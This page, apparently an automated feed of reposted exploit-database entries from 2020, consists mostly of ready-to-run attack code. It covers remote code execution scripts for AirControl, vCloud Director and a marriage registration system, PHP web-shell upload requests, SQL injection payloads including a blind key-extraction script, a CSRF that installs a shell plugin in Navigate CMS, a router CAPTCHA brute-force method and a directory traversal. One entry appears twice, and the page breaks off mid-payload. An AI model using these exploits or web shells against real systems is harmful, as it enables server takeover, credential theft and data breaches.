All posts by ISHACK AI BOT

  1. ```python
     # Exploit Title: AirControl 1.4.2 - PreAuth Remote Code Execution
     # Date: 2020-06-03
     # Exploit Author: 0xd0ff9 vs j3ssie
     # Vendor Homepage: https://www.ui.com/
     # Software Link: https://www.ui.com/download/#!utilities
     # Version: AirControl <= 1.4.2
     # Signature: https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/aircontrol-rce.yaml

     import requests
     import re
     import urllib
     import sys

     print """USAGE: python exploit_aircontrol.py [url] [cmd]"""

     url = sys.argv[1]
     cmd = sys.argv[2]

     # Seam actionOutcome expression injection; the command output is reflected in the redirect Location header
     burp0_url = url + "/.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.io.BufferedReader').getDeclaredMethod('readLine').invoke(''.getClass().forName('java.io.BufferedReader').getConstructor(''.getClass().forName('java.io.Reader')).newInstance(''.getClass().forName('java.io.InputStreamReader').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Process').getDeclaredMethod('getInputStream').invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(null),'" + cmd + "')))))}"
     burp0_headers = {"User-Agent": "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Doflamingo) Chrome/80.0.3984.0 Safari/537.36", "Connection": "close"}

     r = requests.get(burp0_url, headers=burp0_headers, verify=False, allow_redirects=False)
     Locat = r.headers["Location"]
     res = re.search("pwned=(.*)(&cid=.*)", Locat).group(1)
     print "[Result CMD] ", cmd, ": ", urllib.unquote_plus(res)
     ```
  2. ```
     # Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)
     # Date: 2020-06-02
     # Exploit Author: Selim Enes 'Enesdex' Karaduman
     # Vendor Homepage: https://phpgurukul.com/hostel-management-system/
     # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7210
     # Version: 2.0
     # Tested on: Windows 10 - Wamp Server
     ```

     --Vulnerable file: `/full-profile.php`

     --Vulnerable code:

     ```php
     $ret= mysqli_query($con,"SELECT * FROM registration where emailid = '".$_GET['id']."'");
     ```

     The `id` parameter's value goes into the SQL query directly!

     --Proof Of Concept:

     ```
     sqlmap -u "http://TARGET/hostel/full-profile.php?id=6"
     ```

     OR

     ```
     http://TARGET/hostel/full-profile.php?id=6'
     ```

     A single quote will cause a SQL error.
  3. ```
     # Exploit Title: Clinic Management System 1.0 - Unauthenticated Remote Code Execution
     # Google Dork: N/A
     # Date: 2020-06-02
     # Exploit Author: BKpatron
     # Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
     # Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
     # Version: v1.0
     # Tested on: Win 10
     # CVE: N/A
     # Vulnerability: Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
     # vulnerable file : manage_website.php
     ```

     Details: log in to the website as a patient, then access the `localhost/source%20code/manage_website.php` page, as it does not check for an admin user. Change the website logo and upload your malicious PHP file (`<?php echo shell_exec($_GET["cmd"]); ?>`). If you see the message "Something Went Wrong", you have successfully uploaded the malicious PHP file.

     Path of your file: `http://localhost/source%20code/uploadImage/Logo/your_file.php`

     Proof of Concept: `http://localhost/source%20code/manage_website.php`

     ```http
     POST /source%20code/manage_website.php HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: multipart/form-data; boundary=---------------------------135192786613366
     Content-Length: 2539
     Referer: http://localhost/source%20code/manage_website.php
     Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1
     Connection: keep-alive
     Upgrade-Insecure-Requests: 1

     -----------------------------58631544014332
     Content-Disposition: form-data; name="title"

     -----------------------------58631544014332
     Content-Disposition: form-data; name="short_title"

     -----------------------------58631544014332
     Content-Disposition: form-data; name="footer"

     -----------------------------58631544014332
     Content-Disposition: form-data; name="currency_code"

     -----------------------------58631544014332
     Content-Disposition: form-data; name="currency_symbol"

     -----------------------------58631544014332
     Content-Disposition: form-data; name="old_website_image"

     logo for hospital system.jpg
     -----------------------------58631544014332
     Content-Disposition: form-data; name="website_image"; filename="shell.php"
     Content-Type: application/octet-stream

     <?php echo shell_exec($_GET["cmd"]); ?>
     ```
  4. ```
     # Exploit Title: Oriol Espinal CMS 1.0 - 'id' SQL Injection
     # Google Dork: inurl:/eotools_share/
     # Date: 2020-06-03
     # Exploit Author: TSAR
     # Vendor Homepage: http://www.oriolespinal.es/eowd
     # Software Link: http://www.oriolespinal.es/eotools
     # Version: ALL VERSION UP TO LATEST
     # Tested on: MACOS 10.11.2
     # CVE : NOt YET
     ```

     [1] ########### SQL INJECTION ###########

     Oriol Espinal CMS is prone to a remote SQL injection vulnerability; the following exploit is applicable:

     ```
     http://victim.com/path/eotools_share/editar.php?id=-1%20/*!50000union*/%20/*!50000all*/%20/*!50000select*/%201,2,3,4,5,6,7,8,9,10--
     ```

     [2] ########### SQL INJECTION ###########

     Oriol Espinal CMS is prone to a file upload vulnerability; the following exploit [using Burp Suite] is applicable:

     ```http
     POST /path/eotools_cms/app_gestor_archivos/upload2_iframe.php HTTP/1.1
     Host: victim.com
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: http://victim.com/path/eotools_cms/app_gestor_archivos/upload1_iframe.php
     X-Requested-With: XMLHttpRequest
     Content-Type: multipart/form-data; boundary=---------------------------165073870416097602871919119556
     Content-Length: 740
     Connection: close
     Cookie: PHPSESSID=e159f6c9e8a818251a4ff48d47ab3df3; acopendivids=cortina2; acgroupswithpersist=nada

     -----------------------------165073870416097602871919119556
     Content-Disposition: form-data; name="userfile"; filename="shell.php"
     Content-Type: image/png

     PNG;
     ********************************/
     ********************************/
     GIF89a;
     ********************/
     ********************/<?php $_GET[d]($_GET[dd]); ?>
     -----------------------------165073870416097602871919119556
     Content-Disposition: form-data; name="categoria"

     pdfs
     -----------------------------165073870416097602871919119556
     Content-Disposition: form-data; name="descripcion"

     123
     -----------------------------165073870416097602871919119556
     Content-Disposition: form-data; name="submit"

     upload
     -----------------------------165073870416097602871919119556--
     ```

     The shell path is: `http://victim.com/path/eotools_files/files/shell.php`

     ==========================================================

     Greetz To: @zigo0o - Alnjm33 - ShoOt3r - red virus - pRedAtOr - Elkatrez Elmodamer - Egy-sn!p3r [ALL MUSLIM AND ARAB HACKERS]

     ==========================================================
  5. ```python
     # Exploit Title: Navigate CMS 2.8.7 - 'sidx' SQL Injection (Authenticated)
     # Date: 2020-06-04
     # Exploit Author: Gus Ralph
     # Vendor Homepage: https://www.navigatecms.com/en/home
     # Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
     # Version: 2.8.7
     # Tested on: Ubuntu
     # CVE: N/A
     # This script will leak the "activation_key" value for the user whose ID is set to 1 in the database.
     # The activation key can be used to reset that user's password to whatever you want, bypassing the need to crack a hash.
     # An example password reset URL would be: `/login.php?action=password-reset&value=[ACTIVATION CODE LEAKED FROM DB]`

     import requests, time, string

     user = raw_input("Please enter your username: \n")
     password = raw_input("Please enter your password: \n")
     URL = raw_input("Enter the target URL (in this format 'http://domain.com/navigate/'): \n")

     # Authenticate once and keep the session cookie for the injection requests
     s = requests.Session()
     data = {'login-username': (None, user), 'login-password': (None, password)}
     s.post(url = URL + "login.php", files = data)

     dictionary = string.ascii_lowercase + string.ascii_uppercase + string.digits
     final = ""

     # Time-based blind extraction: a 5 second delay confirms the next character of the key
     while True:
         for x in dictionary:
             payload = '(SELECT (CASE WHEN EXISTS(SELECT password FROM nv_users WHERE activation_key REGEXP BINARY "^' + str(final) + x + '.*" AND id = 1) THEN (SELECT sleep(5)) ELSE date_created END)); -- -'
             r = s.post(url = URL + "/navigate.php?fid=comments&act=1&rows=1&sidx=" + payload)
             if int(r.elapsed.total_seconds()) > 4:
                 final += x
                 print "Leaking contents of admin hash: " + final
                 break
             else:
                 pass
     ```
  6. ```
     # Exploit Title: Clinic Management System 1.0 - Authenticated Arbitrary File Upload
     # Google Dork: N/A
     # Date: 2020-06-02
     # Exploit Author: BKpatron
     # Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
     # Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
     # Version: v1.0
     # Tested on: Win 10
     # CVE: N/A
     # Vulnerability: Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
     # vulnerable file : manage_website.php
     ```

     Details: log in to the website as a patient, then access the `localhost/source%20code/manage_website.php` page, as it does not check for an admin user. Change the website logo and upload your malicious PHP file (`<?php echo shell_exec($_GET["cmd"]); ?>`). If you see the message "Something Went Wrong", you have successfully uploaded the malicious PHP file.

     Path of your file: `http://localhost/source%20code/uploadImage/Logo/your_file.php`

     Proof of Concept: `http://localhost/source%20code/manage_website.php`

     ```http
     POST /source%20code/manage_website.php HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: multipart/form-data; boundary=---------------------------135192786613366
     Content-Length: 2539
     Referer: http://localhost/source%20code/manage_website.php
     Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1
     Connection: keep-alive
     Upgrade-Insecure-Requests: 1

     -----------------------------58631544014332
     Content-Disposition: form-data; name="title"

     -----------------------------58631544014332
     Content-Disposition: form-data; name="short_title"

     -----------------------------58631544014332
     Content-Disposition: form-data; name="footer"

     -----------------------------58631544014332
     Content-Disposition: form-data; name="currency_code"

     -----------------------------58631544014332
     Content-Disposition: form-data; name="currency_symbol"

     -----------------------------58631544014332
     Content-Disposition: form-data; name="old_website_image"

     logo for hospital system.jpg
     -----------------------------58631544014332
     Content-Disposition: form-data; name="website_image"; filename="shell.php"
     Content-Type: application/octet-stream

     <?php echo shell_exec($_GET["cmd"]); ?>
     ```
  7. ```html
     # Exploit Title: Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin)
     # Date: 2020-06-04
     # Exploit Author: Gus Ralph
     # Vendor Homepage: https://www.navigatecms.com/en/home
     # Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
     # Version: 2.8.7
     # Tested on: Ubuntu
     # CVE:

     <!-- After having an authenticated admin access this HTML page, simply go to as an unauthenticated user (path may slightly vary depending on installation location): http://DOMAIN.com/navigate/plugins/chiv/chiv.php -->

     <script>
     var logUrl = "http://localhost/navigate/navigate.php?fid=extensions&act=extension_upload";

     function byteValue(x) {
         return x.charCodeAt(0) & 0xff;
     }

     function toBytes(datastr) {
         var ords = Array.prototype.map.call(datastr, byteValue);
         var ui8a = new Uint8Array(ords);
         return ui8a.buffer;
     }

     if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
         XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
             this.send(toBytes(datastr));
         }
     }

     function fileUpload(fileData, fileName) {
         var fileSize = fileData.length,
             boundary = "---------------------------399386530342483226231822376790",
             uri = logUrl,
             xhr = new XMLHttpRequest();
         var additionalFields = { }
         var fileFieldName = "extension-upload";

         xhr.open("POST", uri, true);
         xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
         xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
         xhr.setRequestHeader("Content-Length", fileSize);
         xhr.withCredentials = "true";

         xhr.onreadystatechange = function() {
             if (xhr.readyState == 4) {
                 if ((xhr.status >= 200 && xhr.status <= 200) || xhr.status == 304) {
                     if (xhr.responseText != "") {
                         alert(JSON.parse(xhr.responseText).msg); // display response.
                     }
                 } else if (xhr.status == 0) {
                     $("#goto").show();
                 }
             }
         }

         var body = "";
         for (var i in additionalFields) {
             if (additionalFields.hasOwnProperty(i)) {
                 body += addField(i, additionalFields[i], boundary);
             }
         }
         body += addFileField(fileFieldName, fileData, fileName, boundary);
         body += "--" + boundary + "--";

         xhr.sendAsBinary(body);
         return true;
     }

     function addField(name, value, boundary) {
         var c = "--" + boundary + "\r\n"
         c += "Content-Disposition: form-data; name='" + name + "'\r\n\r\n";
         c += value + "\r\n";
         return c;
     }

     function addFileField(name, value, filename, boundary) {
         var c = "--" + boundary + "\r\n"
         c += "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "'\r\n";
         c += "Content-Type: application/zip\r\n\r\n";
         c += value + "\r\n";
         return c;
     }

     var start = function() {
         // raw bytes of the chiv.zip plugin archive
         var c = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x77\x9e\x97\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x1c\x00\x63\x68\x69\x76\x2f\x55\x54\x09\x00\x03\xc2\xe3\xa1\x5e\xdb\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00\xa4\x9d\x97\x50\x02\x75\x9f\x67\x85\x00\x00\x00\xc0\x00\x00\x00\x10\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x09\x00\x03\x33\xe2\xa1\x5e\x42\xe2\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x55\x8d\x41\x0a\xc2\x30\x10\x45\xf7\x39\xc5\x90\xb5\x34\x48\x17\x42\x57\x4a\xc9\x05\xea\x09\x62\x32\x90\xa0\xe9\x84\x64\x5a\x15\xf1\xee\xda\xd8\x2e\xfc\xcb\xff\x1e\xff\xbf\x04\x7c\x23\x39\xf0\x0d\x65\x07\xf2\x34\xc0\x59\x6b\xd0\x72\xf7\x03\x33\xe6\x12\x68\x5c\xd0\xbe\x69\xdb\xc3\xd6\x9b\x89\x3d\xe5\xa5\xee\x7d\x98\x0d\xd3\x06\xee\x78\x29\x81\xeb\x96\x67\x4e\xa5\x53\xca\x1b\x7b\x8d\xae\x09\xa4\x8e\xf6\x5f\x76\x58\x6c\x0e\x89\xd7\x87\x01\x23\x31\x42\x4f\x31\x9a\xd1\x81\x7e\xa0\x9d\x2a\x5b\x75\x7e\xa6\x3a\xbc\x7d\x88\xb7\xf8\x00\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x1c\x9e\x97\x50\x37\x55\x33\xfd\x3b\x00\x00\x00\x3b\x00\x00\x00\x15\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x69\x6e\x66\x6f\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x09\x00\x03\x18\xe3\xa1\x5e\x06\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x3c\x68\x31\x3e\x57\x65\x6c\x63\x6f\x6d\x65\x20\x74\x6f\x20\x43\x68\x69\x76\x61\x74\x6f\x27\x73\x20\x52\x43\x45\x20\x70\x6c\x75\x67\x69\x6e\x20\x66\x6f\x72\x20\x4e\x61\x76\x69\x67\x61\x74\x65\x20\x43\x4d\x53\x2e\x3c\x2f\x68\x31\x3e\x0a\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x71\x9e\x97\x50\xfa\x43\x48\xab\x1f\x00\x00\x00\x1f\x00\x00\x00\x0d\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x68\x70\x55\x54\x09\x00\x03\xb5\xe3\xa1\x5e\xa4\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x3c\x3f\x70\x68\x70\x20\x73\x79\x73\x74\x65\x6d\x28\x24\x5f\x47\x45\x54\x5b\x27\x63\x6d\x64\x27\x5d\x29\x3b\x20\x3f\x3e\x0a\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x77\x9e\x97\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\xff\x41\x00\x00\x00\x00\x63\x68\x69\x76\x2f\x55\x54\x05\x00\x03\xc2\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x14\x00\x00\x00\x08\x00\xa4\x9d\x97\x50\x02\x75\x9f\x67\x85\x00\x00\x00\xc0\x00\x00\x00\x10\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xff\x81\x3f\x00\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x05\x00\x03\x33\xe2\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x1c\x9e\x97\x50\x37\x55\x33\xfd\x3b\x00\x00\x00\x3b\x00\x00\x00\x15\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x0e\x01\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x69\x6e\x66\x6f\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x05\x00\x03\x18\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x71\x9e\x97\x50\xfa\x43\x48\xab\x1f\x00\x00\x00\x1f\x00\x00\x00\x0d\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x98\x01\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x68\x70\x55\x54\x05\x00\x03\xb5\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x05\x06\x00\x00\x00\x00\x04\x00\x04\x00\x4f\x01\x00\x00\xfe\x01\x00\x00\x00\x00"
         fileUpload(c, "chiv.zip");
     };
     start();
     </script>
     ```
  8. ```python
     # Exploit Title: VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution
     # Exploit Author: Tomas Melicher
     # Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
     # Date: 2020-05-24
     # Vendor Homepage: https://www.vmware.com/
     # Software Link: https://www.vmware.com/products/cloud-director.html
     # Tested On: vCloud Director 9.7.0.15498291
     # Vulnerability Description:
     # VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name.

     #!/usr/bin/python
     import argparse # pip install argparse
     import base64, os, re, requests, sys

     if sys.version_info >= (3, 0):
         from urllib.parse import urlparse
     else:
         from urlparse import urlparse

     from requests.packages.urllib3.exceptions import InsecureRequestWarning
     requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

     PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}"

     session = requests.Session()

     def login(url, username, password, verbose):
         target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path)
         res = session.get(target_url)
         match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE)
         if match:
             tenant = match.group(1)
         else:
             print('[!] can\'t find tenant identifier')
             return
         if verbose:
             print('[*] tenant: %s'%(tenant))

         match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE)
         if match: # Cloud Director 9.*
             login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0))
             res = session.post(login_url, data={'username':username,'password':password})
             if res.status_code == 401:
                 print('[!] invalid credentials')
                 return
         else: # Cloud Director 10.*
             match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE)
             if match:
                 login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0))
                 headers = {
                     'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))),
                     'Accept': 'application/json;version=29.0',
                     'Content-type': 'application/json;version=29.0'
                 }
                 res = session.post(login_url, headers=headers)
                 if res.status_code == 401:
                     print('[!] invalid credentials')
                     return
             else:
                 print('[!] url for login form was not found')
                 return

         cookies = session.cookies.get_dict()
         jwt = cookies['vcloud_jwt']
         session_id = cookies['vcloud_session_id']
         if verbose:
             print('[*] jwt token: %s'%(jwt))
             print('[*] session_id: %s'%(session_id))

         res = session.get(target_url)
         match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE)
         if match is None:
             print('[!] organization not found')
             return
         organization = match.group(1)
         if verbose:
             print('[*] organization name: %s'%(organization))

         match = re.search(r'orgId : \'([^\']+)', res.content)
         if match is None:
             print('[!] orgId not found')
             return
         org_id = match.group(1)
         if verbose:
             print('[*] organization identifier: %s'%(org_id))

         return (jwt,session_id,organization,org_id)

     def exploit(url, username, password, command, verbose):
         (jwt,session_id,organization,org_id) = login(url, username, password, verbose)
         headers = {
             'Accept': 'application/*+xml;version=29.0',
             'Authorization': 'Bearer %s'%jwt,
             'x-vcloud-authorization': session_id
         }
         admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc)
         res = session.get(admin_url, headers=headers)
         match = re.search(r'<description>\s*([^<\s]+)', res.content, re.IGNORECASE)
         if match:
             version = match.group(1)
             if verbose:
                 print('[*] detected version of Cloud Director: %s'%(version))
         else:
             version = None
             print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0')

         # The SMTP host name of the org email settings is where the expression is evaluated
         email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id)
         payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command))
         data = '<root:OrgEmailSettings xmlns:root="http://www.vmware.com/vcloud/v1.5"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>'
         data += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>'
         data += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>'
         data += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload)
         data += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>'
         res = session.put(email_settings_url, data=data, headers=headers)
         match = re.search(r'value:\s*\[([^\]]+)\]', res.content)
         if verbose:
             print('')
         try:
             print(base64.b64decode(match.group(1)))
         except Exception:
             print(res.content)

     parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]')
     parser.add_argument('-v', action='store_true')
     parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True)
     parser.add_argument('-u', metavar='username', required=True)
     parser.add_argument('-p', metavar='password', required=True)
     parser.add_argument('-c', metavar='command', help='command to execute', default='id')
     args = parser.parse_args()

     url = urlparse(args.t)
     exploit(url, args.u, args.p, args.c, args.v)
     ```
  9. ```
     # Exploit Title: D-Link DIR-615 T1 20.10 - CAPTCHA Bypass
     # Date: 2019-10-12
     # Exploit Author: huzaifa hussain
     # Vendor Homepage: https://in.dlink.com/
     # Version: DIR-615 T1 ver:20.10
     # Tested on: D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1"
     # CVE: CVE-2019-17525
     ```

     D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1"

     A vulnerability found on the login page of D-LINK ROUTER "DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1" allows attackers to easily bypass the CAPTCHA on the login page by BRUTEFORCING.

     ------------------------------------

     D-Link released new firmware designed to protect against logging in to the router using BRUTEFORCING. There is a flaw in the CAPTCHA authentication system that allows an attacker to reuse the same CAPTCHA without reloading a new one.

     ATTACK SCENARIO AND REPRODUCTION STEPS

     1. Find the router login page.
     2. Fill in the required login credentials.
     3. Fill in the CAPTCHA properly and intercept the request in Burp Suite.
     4. Send the request to Intruder and select the target variables, i.e. username & password, which we will brute-force, under the Positions tab.
     5. Set the payloads on the target variables, i.e. username & password, under the Payloads tab.
     6. Set the errors ("the validatecode is invalid" & "username or password error, try again") as GREP-MATCH under the Options tab.
     7. Now hit "Start attack" and you will find the correct credentials.

     -------------------------------------

     Huzaifa Hussain
  10. ```
      # Exploit Title: Navigate CMS 2.8.7 - Authenticated Directory Traversal
      # Date: 2020-06-04
      # Exploit Author: Gus Ralph
      # Vendor Homepage: https://www.navigatecms.com/en/home
      # Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
      # Version: 2.8.7
      # Tested on: Ubuntu
      # CVE: CVE-2020-13795
      ```

      A malicious user can abuse the authenticated templates functionality to traverse out of the templates directory to read and write to any file on the webserver as www-data.

      For this vulnerability, I looked into the "templates" feature of the application. It seems we can edit any file in the application's templates directory, for example: `/var/www/html/navigate/private/1/templates/`

      My initial thought was to traverse out of the current directory and read the global config file (located at `/var/www/html/navigate/cfg/globals.php`). My payload would then consist of creating a template, setting the path to be `/var/www/html/navigate/private/1/templates/../../../cfg/globals.php`

      Furthermore, this can be abused to write to a PHP file and gain RCE on the remote server, for example:

      Traversal payload: `../../../navigate.php`

      PHP Code execution payload:

      ```
      <?php system($_GET['cmd']); ?>
      ```
  11. ```bash
      # Exploit Title: Online Marriage Registration System 1.0 Remote Code Execution
      # Google Dork: N/A
      # Date: 2020-05-31
      # Exploit Author: Selim Enes 'Enesdex' Karaduman
      # Vendor Homepage: https://phpgurukul.com/
      # Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
      # Version: 1.0
      # Tested on: Windows 10 / Xampp Server and Wamp Server
      # CVE : N/A
      # Notes : Exploit Requires Authentication But You Can Register As User For Free, This Is Enough To Exploit System

      #!/bin/bash
      echo "# Online Marriage Registration System 1.0 ---> Remote Code Execution"
      echo "# Author ---> Selim Enes Karaduman"
      echo "# Usage ---> ./exploit.sh -u TARGET_URL(e.g http://10.10.10.10/omrs/ -m MOBILE_NUMBER -p PASSWORD -c COMMAND"

      while getopts u:m:p:c: par
      do
          case $par in
              u) url=$OPTARG ;;
              m) mnum=$OPTARG ;;
              p) passwd=$OPTARG ;;
              c) command=$OPTARG ;;
          esac
      done

      # Log in with the registered user and keep the session cookie
      sess=$(curl -s -i -X POST $url/user/login.php -d "mobno=$mnum&password=$passwd&login=" | grep -F "Set-Cookie" | sed 's/;//g' | cut -d " " -f 2)
      url_for_req=$(echo $url | cut -d "/" -f 3)

      # Submit the marriage registration form with a PHP file in the husimage field
      function upload(){
      curl -i -s -k -X $'POST' \
          -H $"Host: $url_for_req" -H $'Content-Type: multipart/form-data; boundary=---------------------------8759967759481129101498329242' -H $"Cookie: $sess" -H $'Content-Length: 3244' \
          -b $"$sess" \
          --data-binary $'-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"dom\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofhusband\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"husimage\"; filename=\"a.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php\x0aecho system($_GET[\'cmd\']);\x0a?>\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"haddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; 